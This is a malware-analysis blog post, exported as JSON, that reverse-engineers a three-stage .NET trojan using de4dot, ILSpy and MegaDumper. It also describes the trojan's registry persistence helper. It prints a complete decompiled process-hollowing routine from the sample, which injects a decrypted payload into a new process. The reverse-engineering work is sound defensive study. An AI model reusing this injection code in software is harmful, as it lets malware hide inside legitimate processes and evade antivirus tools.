{"id":1156,"date":"2015-09-25T09:11:14","date_gmt":"2015-09-25T09:11:14","guid":{"rendered":"http:\/\/www.gironsec.com\/blog\/?p=1156"},"modified":"2015-09-29T19:12:10","modified_gmt":"2015-09-29T19:12:10","slug":"3-stage-dot-net-trojan","status":"publish","type":"post","link":"https:\/\/www.gironsec.com\/blog\/2015\/09\/3-stage-dot-net-trojan\/","title":{"rendered":"3 stage dot net Trojan"},"content":{"rendered":"<p>Howdy fellow readers. My time is split between video games, code, and work. I have a number of interesting samples I&#8217;ve seen that I&#8217;ve decided to share with you all.<\/p>\n<p>This is a 3+ stage malware, each stage being its own executable (think Inception, but with exes). This isn&#8217;t all that uncommon with malware. The file you first download often isn&#8217;t the main exe. The &#8220;dropper&#8221; will determine your sys info and download the second stage, or the second stage will be hidden away encrypted to hide from AVs and heuristics. 
<\/p>\n<p>The <a href=\"https:\/\/www.virustotal.com\/en\/file\/8e3602a83178039c076b74cc38d8fdf502b1a1a1a3c312b5a0700c682524ae8d\/analysis\/\" target=\"_blank\">file<\/a><\/p>\n<p>SHA256: \t8e3602a83178039c076b74cc38d8fdf502b1a1a1a3c312b5a0700c682524ae8d<br \/>\nFile name: \tmanptca.exe<br \/>\nDetection ratio: \t35 \/ 57<br \/>\nAnalysis date: \t2015-09-16 21:18:29 UTC ( 1 week, 1 day ago ) <\/p>\n<p>First thing I do is load the guy up with CFF Explorer and explore&#8230;<br \/>\n<a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p1.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p1.png\" alt=\"p1\" width=\"374\" height=\"434\" class=\"alignnone size-full wp-image-1158\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p1.png 749w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p1-259x300.png 259w\" sizes=\"(max-width: 374px) 100vw, 374px\" \/><\/a><\/p>\n<p>Sample is .net, but I already knew that. The version is 2.0 (version string in the Metadata header).<\/p>\n<p>Since it&#8217;s a .NET binary, we can load the sample into ilspy, or reflector, or some sort of decompiler.<\/p>\n<p><a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p2-2.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p2-2-300x260.png\" alt=\"p2-2\" width=\"300\" height=\"260\" class=\"alignnone size-medium wp-image-1171\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p2-2-300x260.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p2-2.png 886w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>As we can see, the sample is obfuscated. I also see a bitmap stored as a resource named &#8216;jucausa&#8217;. More on that image later and how it relates to our stage 3. 
<\/p>\n<p>The easiest way to defeat most obfuscation is a little utility called <a href=\"https:\/\/github.com\/0xd4d\/de4dot\" target=\"_blank\">de4dot<\/a>. Just compile, drag, and drop. <\/p>\n<p><a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p3.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p3.png\" alt=\"p3\" width=\"339\" height=\"171\" class=\"alignnone size-full wp-image-1160\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p3.png 677w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p3-300x152.png 300w\" sizes=\"(max-width: 339px) 100vw, 339px\" \/><\/a><\/p>\n<p>As you can see, de4dot identified the obfuscator and automatically changed everything back to normal. Nice eh? Now let&#8217;s look at the binary again in ilspy (Reflector is a piece of shit sometimes). <\/p>\n<p><a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p4.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p4-300x164.png\" alt=\"p4\" width=\"300\" height=\"164\" class=\"alignnone size-medium wp-image-1161\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p4-300x164.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p4-1024x558.png 1024w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p4.png 1313w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>The sample has been deobfuscated, but is still a mess. What can we do? Enter <a href=\"http:\/\/www.gironsec.com\/code\/MegaDumper.zip\" target=\"_blank\">MegaDumper<\/a>. Russians make the best tools. So how does this work? Well, MegaDumper allows us to dump .net binaries straight from memory. 
All we have to do is run the exe, suspend its main thread, then dump away.<\/p>\n<p>It&#8217;s easier to just record how it&#8217;s done here:<br \/>\n<iframe loading=\"lazy\" width=\"420\" height=\"315\" src=\"https:\/\/www.youtube.com\/embed\/MoLmpryw6kw\" frameborder=\"0\" allowfullscreen><\/iframe><\/p>\n<p>Now we have our decrypted content.<br \/>\n<a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p5.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p5.png\" alt=\"p5\" width=\"782\" height=\"398\" class=\"alignnone size-full wp-image-1162\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p5.png 782w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p5-300x153.png 300w\" sizes=\"(max-width: 782px) 100vw, 782px\" \/><\/a><\/p>\n<p>The &#8216;manptca.exe&#8217; file is our original file. The other 2 files are loaded by the original binary. Let&#8217;s peek at each.<\/p>\n<p>&#8216;snoop.exe&#8217; seems to be obfuscated; however, a quick run through de4dot shows us what it is.<\/p>\n<p>Opening the thing up with ilspy, we see a number of dynamically constructed strings.<br \/>\n<a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p7.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p7-300x169.png\" alt=\"p7\" width=\"300\" height=\"169\" class=\"alignnone size-medium wp-image-1163\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p7-300x169.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p7-1024x576.png 1024w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p7.png 1920w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><br \/>\nThis is one reason why being a coder helps with reversing &#8211; having the compiler by your side is a life saver.<br \/>\n<a 
href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p8.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p8-300x173.png\" alt=\"p8\" width=\"300\" height=\"173\" class=\"alignnone size-medium wp-image-1164\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p8-300x173.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p8-1024x591.png 1024w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p8.png 1721w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Just reviewing the code, this looks to be a helper exe, in that it &#8216;helps&#8217; the main exe maintain persistence (it adds the exe to a registry startup path). Not very interesting.<br \/>\n<a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1333091162618.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1333091162618.png\" alt=\"1333091162618\" width=\"493\" height=\"402\" class=\"alignnone size-full wp-image-1165\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1333091162618.png 493w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/1333091162618-300x245.png 300w\" sizes=\"(max-width: 493px) 100vw, 493px\" \/><\/a><\/p>\n<p>&#8216;mydllclass&#8217; is much more interesting.<\/p>\n<p>The sample contains our process hollowing methods and injection criteria, some interesting decryption, and our final stage 3 product. <\/p>\n<p>The following is some code I pulled from the mydllclass module. It should look familiar. For those who don&#8217;t know, it&#8217;s <a href=\"http:\/\/www.autosectools.com\/process-hollowing.pdf\" target=\"_blank\">process hollowing<\/a> code. 
<\/p>\n<p><!-- HTML generated using hilite.me --><\/p>\n<div style=\"background: #000000; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;\">\n<pre style=\"margin: 0; line-height: 125%\"><span style=\"color: #cdcd00\">internal<\/span> <span style=\"color: #cdcd00\">static<\/span> <span style=\"color: #00cd00\">bool<\/span> <span style=\"color: #cccccc\">HandleRun(<\/span><span style=\"color: #00cd00\">string<\/span> <span style=\"color: #cccccc\">path,<\/span> <span style=\"color: #00cd00\">string<\/span> <span style=\"color: #cccccc\">cmd,<\/span> <span style=\"color: #00cd00\">byte<\/span><span style=\"color: #cccccc\">[]<\/span> <span style=\"color: #cccccc\">data,<\/span> <span style=\"color: #00cd00\">bool<\/span> <span style=\"color: #cccccc\">compatible)<\/span>\r\n<span style=\"color: #cccccc\">{<\/span>\r\n  <span style=\"color: #cccccc\">NewRP.ProcessId<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">-<\/span><span style=\"color: #cd00cd\">1<\/span><span style=\"color: #cccccc\">;<\/span>\r\n  <span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">readWrite<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cd00cd\">0<\/span><span style=\"color: #cccccc\">;<\/span>\r\n  <span style=\"color: #cccccc\">NewRP.STARTUP_INFORMATION<\/span> <span style=\"color: #cccccc\">sI<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cdcd00\">default<\/span><span style=\"color: #cccccc\">(NewRP.STARTUP_INFORMATION);<\/span>\r\n  <span style=\"color: #cccccc\">NewRP.PROCESS_INFORMATION<\/span> <span style=\"color: #cccccc\">pROCESS_INFORMATION<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cdcd00\">default<\/span><span style=\"color: #cccccc\">(NewRP.PROCESS_INFORMATION);<\/span>\r\n  <span style=\"color: #cccccc\">sI.Size<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: 
#cccccc\">Convert.ToUInt32(Marshal.SizeOf(<\/span><span style=\"color: #cdcd00\">typeof<\/span><span style=\"color: #cccccc\">(NewRP.STARTUP_INFORMATION)));<\/span>\r\n  <span style=\"color: #cdcd00\">try<\/span>\r\n  <span style=\"color: #cccccc\">{<\/span>\r\n  \t<span style=\"color: #00cd00\">string<\/span> <span style=\"color: #cccccc\">text<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #00cd00\">string<\/span><span style=\"color: #cccccc\">.Format(<\/span><span style=\"color: #cd0000\">&quot;\\&quot;{0}\\&quot;&quot;<\/span><span style=\"color: #cccccc\">,<\/span> <span style=\"color: #cccccc\">path);<\/span>\r\n  \t<span style=\"color: #cdcd00\">if<\/span> <span style=\"color: #cccccc\">(!<\/span><span style=\"color: #00cd00\">string<\/span><span style=\"color: #cccccc\">.IsNullOrEmpty(cmd))<\/span>\r\n  \t<span style=\"color: #cccccc\">{<\/span>\r\n  \t\t<span style=\"color: #cccccc\">text<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">text<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cd0000\">&quot; &quot;<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cccccc\">cmd;<\/span>\r\n  \t<span style=\"color: #cccccc\">}<\/span>\r\n  \t<span style=\"color: #cccccc\">pROCESS_INFORMATION<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">Fixes.ProcessInformation(path,<\/span> <span style=\"color: #cccccc\">text,<\/span> <span style=\"color: #cccccc\">sI,<\/span> <span style=\"color: #cccccc\">pROCESS_INFORMATION);<\/span>\r\n  \t<span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">num<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">BitConverter.ToInt32(data,<\/span> <span style=\"color: #cd00cd\">60<\/span><span style=\"color: #cccccc\">);<\/span>\r\n  \t<span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">num2<\/span> <span style=\"color: #cccccc\">=<\/span> 
<span style=\"color: #cccccc\">BitConverter.ToInt32(data,<\/span> <span style=\"color: #cccccc\">num<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cd00cd\">52<\/span><span style=\"color: #cccccc\">);<\/span>\r\n  \t<span style=\"color: #00cd00\">int<\/span><span style=\"color: #cccccc\">[]<\/span> <span style=\"color: #cccccc\">array<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cdcd00\">new<\/span> <span style=\"color: #00cd00\">int<\/span><span style=\"color: #cccccc\">[<\/span><span style=\"color: #cd00cd\">179<\/span><span style=\"color: #cccccc\">];<\/span>\r\n  \t<span style=\"color: #cccccc\">array[<\/span><span style=\"color: #cd00cd\">0<\/span><span style=\"color: #cccccc\">]<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cd00cd\">65538<\/span><span style=\"color: #cccccc\">;<\/span>\r\n  \t<span style=\"color: #cccccc\">Pack.GetValue(pROCESS_INFORMATION,<\/span> <span style=\"color: #cccccc\">array);<\/span>\r\n  \t<span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">num3<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">array[<\/span><span style=\"color: #cd00cd\">41<\/span><span style=\"color: #cccccc\">];<\/span>\r\n  \t<span style=\"color: #cccccc\">Pack.GetValueA(pROCESS_INFORMATION,<\/span> <span style=\"color: #cccccc\">num3,<\/span> <span style=\"color: #cd00cd\">0<\/span><span style=\"color: #cccccc\">,<\/span> <span style=\"color: #cccccc\">readWrite,<\/span> <span style=\"color: #cccccc\">num2);<\/span>\r\n  \t<span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">length<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">BitConverter.ToInt32(data,<\/span> <span style=\"color: #cccccc\">num<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cd00cd\">80<\/span><span style=\"color: #cccccc\">);<\/span>\r\n  \t<span style=\"color: #00cd00\">int<\/span> <span 
style=\"color: #cccccc\">bufferSize<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">BitConverter.ToInt32(data,<\/span> <span style=\"color: #cccccc\">num<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cd00cd\">84<\/span><span style=\"color: #cccccc\">);<\/span>\r\n  \t<span style=\"color: #00cd00\">bool<\/span> <span style=\"color: #cccccc\">flag<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cdcd00\">false<\/span><span style=\"color: #cccccc\">;<\/span>\r\n  \t<span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">num4<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">NewRP.VirtualAllocEx(pROCESS_INFORMATION.ProcessHandle,<\/span> <span style=\"color: #cccccc\">num2,<\/span> <span style=\"color: #cccccc\">length,<\/span> <span style=\"color: #cd00cd\">12288<\/span><span style=\"color: #cccccc\">,<\/span> <span style=\"color: #cd00cd\">64<\/span><span style=\"color: #cccccc\">);<\/span>\r\n  \t<span style=\"color: #cdcd00\">if<\/span> <span style=\"color: #cccccc\">(!compatible<\/span> <span style=\"color: #cccccc\">&amp;&amp;<\/span> <span style=\"color: #cccccc\">num4<\/span> <span style=\"color: #cccccc\">==<\/span> <span style=\"color: #cd00cd\">0<\/span><span style=\"color: #cccccc\">)<\/span>\r\n  \t<span style=\"color: #cccccc\">{<\/span>\r\n  \t\t<span style=\"color: #cccccc\">flag<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cdcd00\">true<\/span><span style=\"color: #cccccc\">;<\/span>\r\n  \t\t<span style=\"color: #cccccc\">num4<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">NewRP.VirtualAllocEx(pROCESS_INFORMATION.ProcessHandle,<\/span> <span style=\"color: #cd00cd\">0<\/span><span style=\"color: #cccccc\">,<\/span> <span style=\"color: #cccccc\">length,<\/span> <span style=\"color: #cd00cd\">12288<\/span><span style=\"color: #cccccc\">,<\/span> <span style=\"color: 
#cd00cd\">64<\/span><span style=\"color: #cccccc\">);<\/span>\r\n  \t<span style=\"color: #cccccc\">}<\/span>\r\n  \t<span style=\"color: #cdcd00\">if<\/span> <span style=\"color: #cccccc\">(num4<\/span> <span style=\"color: #cccccc\">==<\/span> <span style=\"color: #cd00cd\">0<\/span><span style=\"color: #cccccc\">)<\/span>\r\n  \t<span style=\"color: #cccccc\">{<\/span>\r\n  \t\t<span style=\"color: #cdcd00\">throw<\/span> <span style=\"color: #cdcd00\">new<\/span> <span style=\"color: #cccccc\">Exception();<\/span>\r\n  \t<span style=\"color: #cccccc\">}<\/span>\r\n  \t<span style=\"color: #cdcd00\">if<\/span> <span style=\"color: #cccccc\">(!NewRP.WriteProcessMemory(pROCESS_INFORMATION.ProcessHandle,<\/span> <span style=\"color: #cccccc\">num4,<\/span> <span style=\"color: #cccccc\">data,<\/span> <span style=\"color: #cccccc\">bufferSize,<\/span> <span style=\"color: #cdcd00\">out<\/span> <span style=\"color: #cccccc\">readWrite))<\/span>\r\n  \t<span style=\"color: #cccccc\">{<\/span>\r\n  \t\t<span style=\"color: #cdcd00\">throw<\/span> <span style=\"color: #cdcd00\">new<\/span> <span style=\"color: #cccccc\">Exception();<\/span>\r\n  \t<span style=\"color: #cccccc\">}<\/span>\r\n  \t<span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">num5<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">num<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cd00cd\">248<\/span><span style=\"color: #cccccc\">;<\/span>\r\n  \t<span style=\"color: #00cd00\">short<\/span> <span style=\"color: #cccccc\">num6<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">BitConverter.ToInt16(data,<\/span> <span style=\"color: #cccccc\">num<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cd00cd\">6<\/span><span style=\"color: #cccccc\">);<\/span>\r\n  \t<span style=\"color: #cdcd00\">for<\/span> <span style=\"color: #cccccc\">(<\/span><span style=\"color: 
#00cd00\">int<\/span> <span style=\"color: #cccccc\">i<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cd00cd\">0<\/span><span style=\"color: #cccccc\">;<\/span> <span style=\"color: #cccccc\">i<\/span> <span style=\"color: #cccccc\">&lt;=<\/span> <span style=\"color: #cccccc\">(<\/span><span style=\"color: #00cd00\">int<\/span><span style=\"color: #cccccc\">)(num6<\/span> <span style=\"color: #cccccc\">-<\/span> <span style=\"color: #cd00cd\">1<\/span><span style=\"color: #cccccc\">);<\/span> <span style=\"color: #cccccc\">i++)<\/span>\r\n  \t<span style=\"color: #cccccc\">{<\/span>\r\n  \t\t<span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">num7<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">BitConverter.ToInt32(data,<\/span> <span style=\"color: #cccccc\">num5<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cd00cd\">12<\/span><span style=\"color: #cccccc\">);<\/span>\r\n  \t\t<span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">num8<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">BitConverter.ToInt32(data,<\/span> <span style=\"color: #cccccc\">num5<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cd00cd\">16<\/span><span style=\"color: #cccccc\">);<\/span>\r\n  \t\t<span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">srcOffset<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">BitConverter.ToInt32(data,<\/span> <span style=\"color: #cccccc\">num5<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cd00cd\">20<\/span><span style=\"color: #cccccc\">);<\/span>\r\n  \t\t<span style=\"color: #cdcd00\">if<\/span> <span style=\"color: #cccccc\">(num8<\/span> <span style=\"color: #cccccc\">!=<\/span> <span style=\"color: #cd00cd\">0<\/span><span style=\"color: #cccccc\">)<\/span>\r\n  \t\t<span style=\"color: 
#cccccc\">{<\/span>\r\n    <span style=\"color: #00cd00\">byte<\/span><span style=\"color: #cccccc\">[]<\/span> <span style=\"color: #cccccc\">array2<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cdcd00\">new<\/span> <span style=\"color: #00cd00\">byte<\/span><span style=\"color: #cccccc\">[num8];<\/span>\r\n    <span style=\"color: #cccccc\">Buffer.BlockCopy(data,<\/span> <span style=\"color: #cccccc\">srcOffset,<\/span> <span style=\"color: #cccccc\">array2,<\/span> <span style=\"color: #cd00cd\">0<\/span><span style=\"color: #cccccc\">,<\/span> <span style=\"color: #cccccc\">array2.Length);<\/span>\r\n    <span style=\"color: #cccccc\">NewRP.WWriteProcessMemory<\/span> <span style=\"color: #cccccc\">arg_1A3_0<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">NewRP.WriteProcessMemory;<\/span>\r\n    <span style=\"color: #cccccc\">IntPtr<\/span> <span style=\"color: #cccccc\">arg_1A3_1<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">pROCESS_INFORMATION.ProcessHandle;<\/span>\r\n    <span style=\"color: #00cd00\">int<\/span> <span style=\"color: #cccccc\">arg_1A3_2<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">num4<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cccccc\">num7;<\/span>\r\n    <span style=\"color: #00cd00\">byte<\/span><span style=\"color: #cccccc\">[]<\/span> <span style=\"color: #cccccc\">expr_19E<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">array2;<\/span>\r\n    <span style=\"color: #cdcd00\">if<\/span> <span style=\"color: #cccccc\">(!arg_1A3_0(arg_1A3_1,<\/span> <span style=\"color: #cccccc\">arg_1A3_2,<\/span> <span style=\"color: #cccccc\">expr_19E,<\/span> <span style=\"color: #cccccc\">expr_19E.Length,<\/span> <span style=\"color: #cdcd00\">out<\/span> <span style=\"color: #cccccc\">readWrite))<\/span>\r\n    <span style=\"color: #cccccc\">{<\/span>\r\n    \t<span 
style=\"color: #cdcd00\">throw<\/span> <span style=\"color: #cdcd00\">new<\/span> <span style=\"color: #cccccc\">Exception();<\/span>\r\n    <span style=\"color: #cccccc\">}<\/span>\r\n  \t\t<span style=\"color: #cccccc\">}<\/span>\r\n  \t\t<span style=\"color: #cccccc\">num5<\/span> <span style=\"color: #cccccc\">+=<\/span> <span style=\"color: #cd00cd\">40<\/span><span style=\"color: #cccccc\">;<\/span>\r\n  \t<span style=\"color: #cccccc\">}<\/span>\r\n  \t<span style=\"color: #00cd00\">byte<\/span><span style=\"color: #cccccc\">[]<\/span> <span style=\"color: #cccccc\">bytes<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">Fixes.GetBytes(num4);<\/span>\r\n  \t<span style=\"color: #cdcd00\">if<\/span> <span style=\"color: #cccccc\">(!NewRP.WriteProcessMemory(pROCESS_INFORMATION.ProcessHandle,<\/span> <span style=\"color: #cccccc\">num3<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cd00cd\">8<\/span><span style=\"color: #cccccc\">,<\/span> <span style=\"color: #cccccc\">bytes,<\/span> <span style=\"color: #cd00cd\">4<\/span><span style=\"color: #cccccc\">,<\/span> <span style=\"color: #cdcd00\">out<\/span> <span style=\"color: #cccccc\">readWrite))<\/span>\r\n  \t<span style=\"color: #cccccc\">{<\/span>\r\n  \t\t<span style=\"color: #cdcd00\">throw<\/span> <span style=\"color: #cdcd00\">new<\/span> <span style=\"color: #cccccc\">Exception();<\/span>\r\n  \t<span style=\"color: #cccccc\">}<\/span>\r\n  \t<span style=\"color: #cccccc\">NewRP.WriteProcessMemory(pROCESS_INFORMATION.ProcessHandle,<\/span> <span style=\"color: #cccccc\">num3<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cd00cd\">8<\/span><span style=\"color: #cccccc\">,<\/span> <span style=\"color: #cccccc\">bytes,<\/span> <span style=\"color: #cd00cd\">4<\/span><span style=\"color: #cccccc\">,<\/span> <span style=\"color: #cdcd00\">out<\/span> <span style=\"color: #cccccc\">readWrite);<\/span>\r\n  \t<span style=\"color: 
#00cd00\">int<\/span> <span style=\"color: #cccccc\">num9<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">Class1.ToInt32(data,<\/span> <span style=\"color: #cccccc\">num);<\/span>\r\n  \t<span style=\"color: #cdcd00\">if<\/span> <span style=\"color: #cccccc\">(flag)<\/span>\r\n  \t<span style=\"color: #cccccc\">{<\/span>\r\n  \t\t<span style=\"color: #cccccc\">num4<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">num2;<\/span>\r\n  \t<span style=\"color: #cccccc\">}<\/span>\r\n  \t<span style=\"color: #cccccc\">array[<\/span><span style=\"color: #cd00cd\">44<\/span><span style=\"color: #cccccc\">]<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">num4<\/span> <span style=\"color: #cccccc\">+<\/span> <span style=\"color: #cccccc\">num9;<\/span>\r\n  \t<span style=\"color: #cccccc\">Fixes.GetValueB(pROCESS_INFORMATION,<\/span> <span style=\"color: #cccccc\">array);<\/span>\r\n  \t<span style=\"color: #cdcd00\">if<\/span> <span style=\"color: #cccccc\">((<\/span><span style=\"color: #00cd00\">ulong<\/span><span style=\"color: #cccccc\">)NewRP.ResumeThread(pROCESS_INFORMATION.ThreadHandle)<\/span> <span style=\"color: #cccccc\">==<\/span> <span style=\"color: #cd00cd\">18446744073709551615<\/span><span style=\"color: #cccccc\">uL)<\/span>\r\n  \t<span style=\"color: #cccccc\">{<\/span>\r\n  \t\t<span style=\"color: #cdcd00\">throw<\/span> <span style=\"color: #cdcd00\">new<\/span> <span style=\"color: #cccccc\">Exception();<\/span>\r\n  \t<span style=\"color: #cccccc\">}<\/span>\r\n  <span style=\"color: #cccccc\">}<\/span>\r\n  <span style=\"color: #cdcd00\">catch<\/span>\r\n  <span style=\"color: #cccccc\">{<\/span>\r\n  \t<span style=\"color: #cccccc\">Process<\/span> <span style=\"color: #cccccc\">expr_251<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">Class1.GetProcessById(pROCESS_INFORMATION);<\/span>\r\n  \t<span style=\"color: 
#cdcd00\">if<\/span> <span style=\"color: #cccccc\">(expr_251<\/span> <span style=\"color: #cccccc\">!=<\/span> <span style=\"color: #cdcd00\">null<\/span><span style=\"color: #cccccc\">)<\/span>\r\n  \t<span style=\"color: #cccccc\">{<\/span>\r\n  \t\t<span style=\"color: #cccccc\">expr_251.Kill();<\/span>\r\n  \t<span style=\"color: #cccccc\">}<\/span>\r\n  \t<span style=\"color: #cdcd00\">return<\/span> <span style=\"color: #cdcd00\">false<\/span><span style=\"color: #cccccc\">;<\/span>\r\n  <span style=\"color: #cccccc\">}<\/span>\r\n  <span style=\"color: #cccccc\">NewRP.ProcessId<\/span> <span style=\"color: #cccccc\">=<\/span> <span style=\"color: #cccccc\">(<\/span><span style=\"color: #00cd00\">int<\/span><span style=\"color: #cccccc\">)pROCESS_INFORMATION.ProcessId;<\/span>\r\n  <span style=\"color: #cdcd00\">return<\/span> <span style=\"color: #cdcd00\">true<\/span><span style=\"color: #cccccc\">;<\/span>\r\n<span style=\"color: #cccccc\">}<\/span>\r\n<\/pre>\n<\/div>\n<p>How is this used \/ implemented? Remember the bitmap from earlier in the resources section? This data file is decrypted in stage 2 and run as stage 3 via process hollowing.<\/p>\n<p><a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p10.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p10-300x115.png\" alt=\"p10\" width=\"300\" height=\"115\" class=\"alignnone size-medium wp-image-1172\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p10-300x115.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p10-1024x393.png 1024w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2015\/09\/p10.png 1377w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>There&#8217;s a lot of code to this sample, but it&#8217;s fairly straightforward. 
